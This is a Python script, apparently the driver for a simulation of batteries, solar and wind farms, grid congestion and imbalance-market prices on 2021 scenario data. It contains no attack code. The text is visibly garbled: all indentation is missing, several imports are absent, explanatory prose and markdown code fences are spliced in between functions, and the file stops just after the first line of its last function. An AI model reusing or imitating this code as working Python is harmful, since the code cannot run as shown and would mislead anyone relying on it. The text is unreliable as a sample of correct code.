from helper_objects.strategies.PointBasedStrategy import PointBasedStrategy
from helper_objects.strategies.RandomStrategyGenerator import generate_random_discharge_relative_strategy
from helper_objects.strategies.giga_baseline_strategies import get_month_strategy
from network_objects.Battery import Battery
from network_objects.control_strategies.ModesOfOperationController import ModesOfOperationController
from network_objects.control_strategies.MonthOfModesOfOperationController import MonthOfModesOfOperationController
from network_objects.control_strategies.SolveCongestionAndLimitedChargeControlTower import \
SolveCongestionAndLimitedChargeControlTower
from network_objects.control_strategies.StrategyControlTower import StrategyControlTower
from environment.ImbalanceEnvironment import ImbalanceEnvironment
from network_objects.control_strategies.StrategyWithLimitedChargeCapacityControlTower import \
StrategyWithLimitedChargeCapacityControlTower
from network_objects.control_strategies.SolveCongestionControlTower import \
SolveCongestionControlTower
from network_objects.RenewableEnergyGenerator import RenewableEnergyGenerator
base_scenario = os.path.join('data', 'environments', 'lelystad_1_2021.csv')
utc = dateutil.tz.tzutc()
def run_random_thirty_days(scenario=base_scenario, verbose_lvl=2, simulation_environment=None):
start_day = random.randint(0, 333)
starting_timestep = start_day * 24 * 60
    number_of_steps = 30 * 24 * 60  # thirty days of one-minute timesteps
print('Random thirty days - Starting timestep: {} - Number of Steps: {}'.format(starting_timestep, number_of_steps))
res = run_simulation(starting_timestep, number_of_steps, scenario=scenario, verbose_lvl=verbose_lvl, simulation_environment=simulation_environment)
print('Just ran random thirty days.- Starting timestep: {} - Number of Steps: {}'.format(starting_timestep, number_of_steps))
return res
def run_single_month(month, scenario=base_scenario, verbose_lvl=2, simulation_environment=None):
starting_timesteps = [0, 60, 44700, 85020, 129600, 172800, 217440, 260475, 305115, 349755, 392955, 437595, 480795, 525376]
assert 13 > month > 0
dt_month = dt.datetime(2021, month, 1)
month_str = dt_month.strftime('%B %Y')
starting_timestep = starting_timesteps[month]
number_of_steps = starting_timesteps[month + 1] - starting_timestep
print('Run {} - Starting timestep: {} - Number of Steps: {}'.format(month_str, starting_timestep, number_of_steps))
res = run_simulation(starting_timestep, number_of_steps, scenario=scenario, verbose_lvl=verbose_lvl,
simulation_environment=simulation_environment)
print('Just ran {} - Starting timestep: {} - Number of Steps: {}'.format(month_str, starting_timestep, number_of_steps))
return res
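The hard-coded `starting_timesteps` table in `run_single_month` mostly follows from the calendar: each month contributes `days * 24 * 60` one-minute steps, after a 60-minute header at the start of the scenario file. A hedged sketch (`month_start_offsets` is a hypothetical helper, not part of main.py; the real table also absorbs DST shifts and data gaps, so months after March drift from a pure calendar count):

```python
import calendar

def month_start_offsets(year, head_offset=60):
    # Cumulative minute offset of each month's first timestep in a
    # minute-resolution scenario file, assuming `head_offset` minutes
    # of data precede 1 January.
    offsets = [head_offset]
    for month in range(1, 13):
        days_in_month = calendar.monthrange(year, month)[1]
        offsets.append(offsets[-1] + days_in_month * 24 * 60)
    return offsets
```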
def run_full_scenario(scenario=base_scenario, verbose_lvl=1, simulation_environment=None):
starting_timestep = 0
with open(scenario) as file:
number_of_steps = len(file.readlines()) + 1
print('Running full scenario {}'.format(scenario))
res = run_simulation(starting_timestep, number_of_steps, scenario=scenario, verbose_lvl=verbose_lvl, simulation_environment=simulation_environment)
print('Just ran full scenario {}\n'.format(scenario))
return res
def run_simulation(starting_time_step=0, number_of_steps=100, scenario=base_scenario, verbose_lvl=3, simulation_environment=None):
if simulation_environment is None:
# Fall back to the baseline simulation when no environment is given.
return baseline_rhino_simulation(verbose_lvl=verbose_lvl)
# open file in read mode
with open(scenario, 'r') as read_obj:
csv_reader = reader(read_obj)
steps_taken = 0
old_day = 0
old_week = 0
old_month = 0
# Open the scenario
for environment_data in csv_reader:
if starting_time_step >= 0: # Skip lines until we reach the starting step.
starting_time_step = starting_time_step - 1
else:
# Figure out date of the data
time_step_dt = dt.datetime.strptime(environment_data[0], '%Y-%m-%d %H:%M:%S%z')
time_step_dt = time_step_dt.astimezone(tz=dt.timezone.utc)
environment_data[0] = time_step_dt
time_step_string = time_step_dt.strftime('%H:%M %d-%m-%Y UTC')
# Announce start of simulation
if steps_taken == 0 and verbose_lvl >= 0:
print('Starting simulation from PTU {}'.format(time_step_string))
# Give an update of how it is going in the mean_time
curr_month = time_step_dt.month
curr_week = time_step_dt.isocalendar()[1]
curr_day = time_step_dt.day
if (curr_day != old_day and verbose_lvl > 2) or \
(curr_week != old_week and verbose_lvl > 1) or \
(curr_month != old_month and verbose_lvl > 0):
msg = time_step_string[6:-4] + '\n\t' + simulation_environment.done_in_mean_time()
print(msg)
old_day = curr_day
old_week = curr_week
old_month = curr_month
# End simulation here if number of steps have been taken.
if steps_taken >= number_of_steps: # If we reach our maximum amount of steps. Stop the simulation
break
else:
# Otherwise, ensure the environment step's data is valid
try:
if environment_data[1] == 'nan':
raise ValueError
if 'windnet' in scenario:
environment_data[2] = float(environment_data[2])
environment_data[1] = float(environment_data[1])
environment_data[3] = float(environment_data[3])
environment_data[5] = float(environment_data[5])
environment_data[7] = float(environment_data[7])
elif 'lelystad' in scenario:
environment_data[1] = float(environment_data[1])
environment_data[2] = float(environment_data[2])
environment_data[3] = float(environment_data[3])
environment_data[4] = float(environment_data[4])
environment_data[5] = None if environment_data[5] == '' else float(environment_data[5])
environment_data[6] = None if environment_data[6] == '' else float(environment_data[6])
environment_data[7] = None if environment_data[7] == '' else float(environment_data[7])
environment_data[8] = None if environment_data[8] == '' else float(environment_data[8])
environment_data[9] = None if environment_data[9] == '' else float(environment_data[9])
if verbose_lvl > 3:
print(f'Running environment step {time_step_string}')
except ValueError:
if verbose_lvl > 2:
print("Skipping timestep {} as data is missing".format(time_step_string))
continue
# The environment should take a step here.
simulation_environment.take_step(environment_data)
# Update steps taken
steps_taken = steps_taken + 1
# Print information at the end of the simulation.
if verbose_lvl >= 0:
msg = time_step_string[6:-4] + '\n\t' + simulation_environment.done_in_mean_time()
print(msg)
print('----------------------------------------')
print('End of simulation, final PTU: {}'.format(time_step_string))
print(simulation_environment.end_of_environment_message(environment_additions=[]))
return simulation_environment.end_of_environment_metrics(current_metrics={})
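# A self-contained sketch of the timestamp handling used in the loop above:
# scenario rows carry a local timestamp with a UTC offset, which is parsed,
# normalised to UTC, and then formatted for the log messages (helper names
# are hypothetical, not part of the simulation code):

```python
import datetime as dt


def parse_scenario_timestamp(raw):
    # e.g. '2021-01-01 00:00:00+01:00' -> timezone-aware UTC datetime
    parsed = dt.datetime.strptime(raw, '%Y-%m-%d %H:%M:%S%z')
    return parsed.astimezone(tz=dt.timezone.utc)


def format_ptu(time_step_dt):
    # Same formatting as the simulation's log lines.
    return time_step_dt.strftime('%H:%M %d-%m-%Y UTC')
```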
def run_simulation_from_dict_of_df(starting_time_step=0, number_of_steps=100, scenario=base_scenario, verbose_lvl=3,
simulation_environment=None, dict_of_df=None):
if simulation_environment is None or dict_of_df is None:
# Fall back to the baseline simulation when no environment or data is given.
return baseline_rhino_simulation(verbose_lvl=verbose_lvl)
steps_taken = 0
old_day = 0
old_week = 0
old_month = 0
# Open the scenario
for environment_dict in dict_of_df:
if starting_time_step >= 0: # Skip lines until we reach the starting step.
starting_time_step = starting_time_step - 1
else:
environment_data = []
# Figure out date of the data
time_step_dt = dt.datetime.strptime(environment_dict['time_utc'], '%Y-%m-%d %H:%M:%S%z')
time_step_dt = time_step_dt.astimezone(tz=dt.timezone.utc)
environment_data.append(time_step_dt)
time_step_string = time_step_dt.strftime('%H:%M %d-%m-%Y UTC')
# Announce start of simulation
if steps_taken == 0 and verbose_lvl >= 0:
print('Starting simulation from PTU {}'.format(time_step_string))
# Give an update of how it is going in the mean_time
curr_month = time_step_dt.month
curr_week = time_step_dt.isocalendar()[1]
curr_day = time_step_dt.day
if (curr_day != old_day and verbose_lvl > 2) or \
(curr_week != old_week and verbose_lvl > 1) or \
(curr_month != old_month and verbose_lvl > 0):
msg = time_step_string[6:-4] + '\n\t' + simulation_environment.done_in_mean_time()
print(msg)
old_day = curr_day
old_week = curr_week
old_month = curr_month
# End simulation here if number of steps have been taken.
if steps_taken >= number_of_steps: # If we reach our maximum amount of steps. Stop the simulation
break
else:
# Otherwise, ensure the environment step's data is valid
try:
if environment_dict['tennet_balansdelta.mean_max_price'] == 'nan':
raise ValueError
if 'windnet' in scenario:
environment_data.append(float(environment_dict['tennet_balansdelta.mean_max_price']))
environment_data.append(float(environment_dict['tennet_balansdelta.mean_mid_price']))
environment_data.append(float(environment_dict['tennet_balansdelta.mean_min_price']))
# NOTE: the remaining windnet columns were accessed by CSV integer index here,
# which does not work on a dict row; map them to the matching column names.
elif 'lelystad' in scenario:
environment_data.append(float(environment_dict['tennet_balansdelta.mean_max_price']))
environment_data.append(float(environment_dict['tennet_balansdelta.mean_mid_price']))
environment_data.append(float(environment_dict['tennet_balansdelta.mean_min_price']))
environment_data.append(float(environment_dict['power']))
environment_data.append(None if environment_dict['irradiance'] == '' else float(environment_dict['irradiance']))
environment_data.append(None if environment_dict['expected_power'] == '' else float(environment_dict['expected_power']))
environment_data.append(None if environment_dict['lower_range'] == '' else float(environment_dict['lower_range']))
environment_data.append(None if environment_dict['upper_range'] == '' else float(environment_dict['upper_range']))
environment_data.append(None if environment_dict['losses'] == '' else float(environment_dict['losses']))
if verbose_lvl > 3:
print(f'Running environment step {time_step_string}')
except ValueError:
if verbose_lvl > 2:
print("Skipping timestep {} as data is missing".format(time_step_string))
continue
# The environment should take a step here.
simulation_environment.take_step(environment_data)
# Update steps taken
steps_taken = steps_taken + 1
# Print information at the end of the simulation.
if verbose_lvl >= 0:
print('----------------------------------------')
print('End of simulation, final PTU: {}'.format(time_step_string))
print(simulation_environment.end_of_environment_message(environment_additions=[]))
return simulation_environment.end_of_environment_metrics(current_metrics={})
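# Both run loops above coerce raw CSV/dict fields with the same pattern:
# required price columns must parse as floats (a literal 'nan' aborts the
# step), while optional measurement columns map the empty string to None.
# A small helper pair capturing that pattern (hypothetical names):

```python
def parse_required_float(raw):
    # A literal 'nan' marks missing data for a required column; the run
    # loops skip the whole timestep in that case.
    if raw == 'nan':
        raise ValueError('missing required value')
    return float(raw)


def parse_optional_float(raw):
    # Optional columns use the empty string for "no measurement".
    return None if raw == '' else float(raw)
```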
def network_capacity_windnet_simulation(network_capacity=27000, verbose_lvl=1):
# Setup environment
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, network_capacity)
windnet = RenewableEnergyGenerator('Neushoorntocht wind farm', 23000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(windnet, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv', simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def baseline_rhino_simulation(verbose_lvl=1):
# Baseline Rhino simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
rhino = Battery('Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
simple_strategy_controller = StrategyControlTower(name="Rhino Battery Controller", network_object=rhino, strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(simple_strategy_controller, [1, 3])
run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def rhino_windnet_limited_charging(verbose_lvl=1):
# Rhino with limited charging simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
rhino = Battery('Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
strategy_limited_charge_controller = StrategyWithLimitedChargeCapacityControlTower(name="Rhino Battery Controller", network_object=rhino, strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(strategy_limited_charge_controller, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def wombat_solarvation_limited_charging(verbose_lvl=1, base_money_strat=True):
# Wombat with limited charging simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, 14000)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
wombat = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
if base_money_strat:
csv_strategy = CsvStrategy('Rhino strategy 1',
strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
main_controller = StrategyWithLimitedChargeCapacityControlTower(
name="Wombat Battery Controller", network_object=wombat, strategy=csv_strategy, verbose_lvl=verbose_lvl,
transportation_kw=2000)
imbalance_environment.add_object(main_controller, [1, 3, 4])
else:
main_controller = MonthOfModesOfOperationController(name='Wombat main controller',
network_object=wombat, verbose_lvl=verbose_lvl)
for month_num in range(1, 13):
money_earn_strat_month = get_month_strategy(month_num)
limited_charge_controller = StrategyWithLimitedChargeCapacityControlTower(
name=f"Wombat Controller Month {month_num}", network_object=wombat, strategy=money_earn_strat_month,
verbose_lvl=verbose_lvl, transportation_kw=2000)
main_controller.add_controller(limited_charge_controller)
imbalance_environment.add_object(main_controller, [1, 3, 4, 0])
return run_full_scenario(simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def solarvation_dumb_discharging(verbose_lvl=1, congestion_kw=14000):
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
return run_full_scenario(simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def baseline_windnet(verbose_lvl=1):
# Baseline Windnet simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
windnet = RenewableEnergyGenerator('Windnet wind farm', 23000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(windnet, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def baseline_solarvation(verbose_lvl=1):
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def windnet_with_ppa(verbose_lvl=1):
# Windnet with a PPA simulation
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
windnet = RenewableEnergyGenerator('Windnet wind farm', 23000, verbose_lvl=verbose_lvl, ppa=40)
imbalance_environment.add_object(windnet, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def full_rhino_site_capacity(network_capacity=27000, verbose_lvl=1):
# Rhino and Neushoorntocht with network capacity
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, network_capacity)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
rhino = Battery('Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
simple_strategy_controller = StrategyWithLimitedChargeCapacityControlTower(name="Rhino Battery Controller", network_object=rhino,
strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(simple_strategy_controller, [1, 3, 5])
windnet = RenewableEnergyGenerator('Neushoorntocht wind farm', 23000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(windnet, [1, 3, 5])
run_full_scenario(scenario='data/tennet_and_windnet/tennet_balans_delta_and_pandas_windnet.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def random_rhino_strategy_simulation(verbose_lvl=1, seed=None):
# Initialise environment
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
# Initialise random strategy
random_point_based_strategy = generate_random_discharge_relative_strategy(seed=seed)
random_step_battery = Battery('Random Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
simple_strategy_controller = StrategyControlTower(name="Random strategy Battery Controller", network_object=random_step_battery,
strategy=random_point_based_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(simple_strategy_controller, [1, 3])
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
rhino = Battery('Rhino', 7500, 12000, battery_efficiency=0.9, starting_soc_kwh=3750, verbose_lvl=verbose_lvl)
simple_strategy_controller = StrategyControlTower(name="Rhino Battery Controller", network_object=rhino, strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(simple_strategy_controller, [1, 3])
run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
simulation_environment=imbalance_environment, verbose_lvl=verbose_lvl)
def super_naive_baseline(verbose_lvl=1):
network_capacity = 14000
congestion_safety_margin = 0.99
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, network_capacity)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=15000, verbose_lvl=verbose_lvl)
csv_strategy = CsvStrategy('Discharge above 60', strategy_csv='data/strategies/greedy_discharge_60.csv')
congestion_controller = SolveCongestionControlTower(name="Solarvation Congestion Controller", network_object=battery,
congestion_kw=network_capacity, congestion_safety_margin=congestion_safety_margin,
strategy=csv_strategy, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
imbalance_environment.add_object(congestion_controller, [1, 3, 4])
return run_full_scenario(scenario='data/environments/lelystad_1_2021.csv', verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
def baseline(verbose_lvl=1, base_money_strat=True):
congestion_kw = 14000
congestion_safety_margin = 0.99
transportation_kw = 2000
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
imbalance_environment.add_object(solarvation, [1, 3, 4])
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
greedy_discharge_strat = CsvStrategy('Greedy discharge', strategy_csv='data/strategies/greedy_discharge_60.csv')
always_discharge_strat = CsvStrategy('Always discharge', strategy_csv='data/strategies/always_discharge.csv')
solve_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Solve Congestion Controller",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=greedy_discharge_strat,
verbose_lvl=verbose_lvl)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Prepare Congestion",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=always_discharge_strat,
verbose_lvl=verbose_lvl)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name="Rhino strategy 1",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=csv_strategy,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
if base_money_strat:
main_controller = ModesOfOperationController(name='Wombat main controller',
network_object=battery,
verbose_lvl=verbose_lvl)
main_controller.add_mode_of_operation(dt.time(4, 30, tzinfo=utc), earn_money_mod)
main_controller.add_mode_of_operation(dt.time(6, 45, tzinfo=utc), prepare_congestion_mod)
main_controller.add_mode_of_operation(dt.time(16, 45, tzinfo=utc), solve_congestion_mod)
main_controller.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
else:
main_controller = MonthOfModesOfOperationController(name='Wombat main controller',
network_object=battery, verbose_lvl=verbose_lvl)
for month_num in range(1, 13):
money_earn_strat_month = get_month_strategy(month_num)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name=f"GIGA Baseline Month {month_num}",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=money_earn_strat_month,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
single_month_controller = ModesOfOperationController(name='Wombat month controller',
network_object=battery,
verbose_lvl=verbose_lvl)
single_month_controller.add_mode_of_operation(dt.time(4, 30, tzinfo=utc), earn_money_mod)
single_month_controller.add_mode_of_operation(dt.time(6, 45, tzinfo=utc), prepare_congestion_mod)
single_month_controller.add_mode_of_operation(dt.time(16, 45, tzinfo=utc), solve_congestion_mod)
single_month_controller.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
main_controller.add_controller(single_month_controller)
imbalance_environment.add_object(main_controller, [1, 3, 4, 0])
# Run single day
# starting_timestep = 270555
# number_of_steps = 1440
# run_simulation(starting_timestep, number_of_steps, verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
# Run single month
# run_single_month(7, verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
# Run full scenario
return run_full_scenario(scenario='data/environments/lelystad_1_2021.csv', verbose_lvl=verbose_lvl, simulation_environment=imbalance_environment)
def run_monthly_timed_baseline(verbose_lvl=2, transportation_kw=2000, congestion_kw=14000, congestion_strategy=1, base_money_strat=True):
congestion_safety_margin = 0.99
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
csv_strategy = CsvStrategy('Rhino strategy 1', strategy_csv='data/strategies/cleaner_simplified_passive_imbalance_1.csv')
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name="Rhino strategy 1",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=csv_strategy,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
res_df = get_month_congestion_timings(solarvation_identifier='data/environments/lelystad_1_2021.csv', strategy=congestion_strategy)
print(res_df.to_string())
earning_money_until = res_df.loc['prep_start']
preparing_for_congestion_until = res_df.loc['congestion_start']
preparing_max_kwh = res_df.loc['prep_max_soc']
solving_congestion_until = res_df.loc['congestion_end']
main_controller = MonthOfModesOfOperationController(name='Wombat main controller',
network_object=battery,
verbose_lvl=verbose_lvl)
for month in range(12):
moo = ModesOfOperationController(name=f'Wombat controller month {month}',
network_object=battery,
verbose_lvl=verbose_lvl)
if not base_money_strat:
month_num = month + 1
money_earning_strat = get_month_strategy(month_num)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name=f"GIGA Baseline Month {month_num}",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=money_earning_strat,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
if earning_money_until[month] is not NaT:
moo.add_mode_of_operation(earning_money_until[month], earn_money_mod)
max_kwh_in_prep = float(preparing_max_kwh[month])
max_soc_perc_in_prep = int(max_kwh_in_prep / battery.max_kwh * 100)
discharge_until_strategy = DischargeUntilStrategy(base_strategy=csv_strategy,
name='Discharge Money Earner',
discharge_until_soc_perc=max_soc_perc_in_prep
)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name=f"Earn money but discharge until {max_soc_perc_in_prep}",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=discharge_until_strategy,
verbose_lvl=verbose_lvl)
moo.add_mode_of_operation(preparing_for_congestion_until[month], prepare_congestion_mod)
# NOTE: unlike the sibling baselines, the congestion window itself also runs
# prepare_congestion_mod here; no dedicated greedy-discharge controller is defined.
moo.add_mode_of_operation(solving_congestion_until[month], prepare_congestion_mod)
moo.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
main_controller.add_controller(moo)
imbalance_environment.add_object(solarvation, [1, 3, 4])
imbalance_environment.add_object(main_controller, [1, 3, 4, 0])
return run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
verbose_lvl=verbose_lvl,
simulation_environment=imbalance_environment)
def run_random_strategy_with_monthly_times(verbose_lvl=1, seed=None, transportation_kw=2000, congestion_kw=14000):
congestion_safety_margin = 0.99
# Initialise environment
imbalance_environment = NetworkEnvironment(verbose_lvl=verbose_lvl)
ImbalanceEnvironment(imbalance_environment, mid_price_index=2, max_price_index=1, min_price_index=3)
TotalNetworkCapacityTracker(imbalance_environment, congestion_kw)
# Initialise solar farm
solarvation = RenewableEnergyGenerator('Solarvation solar farm', 19000, verbose_lvl=verbose_lvl)
# Initialise battery
battery = Battery('Wombat', 30000, 14000, battery_efficiency=0.9, starting_soc_kwh=1600, verbose_lvl=verbose_lvl)
# Initialise random strategy
random_point_based_strategy = generate_random_discharge_relative_strategy(seed=seed)
if seed is None:
print(f'{random_point_based_strategy.name}')
greedy_discharge_strat = CsvStrategy('Greedy discharge', strategy_csv='data/strategies/greedy_discharge_60.csv')
always_discharge_strat = CsvStrategy('Always discharge', strategy_csv='data/strategies/always_discharge.csv')
solve_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Solve Congestion Controller",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=greedy_discharge_strat,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Prepare Congestion",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=always_discharge_strat,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
earn_money_mod = SolveCongestionAndLimitedChargeControlTower(name="Rhino strategy 1",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=random_point_based_strategy,
verbose_lvl=verbose_lvl,
transportation_kw=transportation_kw)
res_df = get_month_congestion_timings(solarvation_identifier='data/environments/lelystad_1_2021.csv', strategy=1)
print(res_df.to_string())
earning_money_until = res_df.loc['prep_start']
preparing_for_congestion_until = res_df.loc['congestion_start']
preparing_max_kwh = res_df.loc['prep_max_soc']
solving_congestion_until = res_df.loc['congestion_end']
main_controller = MonthOfModesOfOperationController(name='Wombat main controller',
network_object=battery,
verbose_lvl=verbose_lvl)
for month in range(12):
moo = ModesOfOperationController(name=f'Wombat controller month {month}',
network_object=battery,
verbose_lvl=verbose_lvl)
if earning_money_until[month] is not NaT:
moo.add_mode_of_operation(earning_money_until[month], earn_money_mod)
max_kwh_in_prep = float(preparing_max_kwh[month])
max_soc_perc_in_prep = int(max_kwh_in_prep / battery.max_kwh * 100)
discharge_until_strategy = DischargeUntilStrategy(base_strategy=random_point_based_strategy,
name='Discharge Money Earner',
discharge_until_soc_perc=max_soc_perc_in_prep
)
prepare_congestion_mod = SolveCongestionAndLimitedChargeControlTower(name="Prepare Congestion",
network_object=battery,
congestion_kw=congestion_kw,
congestion_safety_margin=congestion_safety_margin,
strategy=discharge_until_strategy,
verbose_lvl=verbose_lvl)
moo.add_mode_of_operation(preparing_for_congestion_until[month], prepare_congestion_mod)
moo.add_mode_of_operation(solving_congestion_until[month], solve_congestion_mod)
moo.add_mode_of_operation(dt.time(23, 59, tzinfo=utc), earn_money_mod)
main_controller.add_controller(moo)
imbalance_environment.add_object(solarvation, [1, 3, 4])
imbalance_environment.add_object(main_controller, [1, 3, 4, 0])
return run_full_scenario(scenario='data/environments/lelystad_1_2021.csv',
verbose_lvl=verbose_lvl,
simulation_environment=imbalance_environment)
def run_single_month_random_strategy(verbose_lvl=1, seed=None, transportation_kw=2000, congestion_kw=14000, month=None):
random_point_based_strategy = generate_random_discharge_relative_strategy(seed=seed)
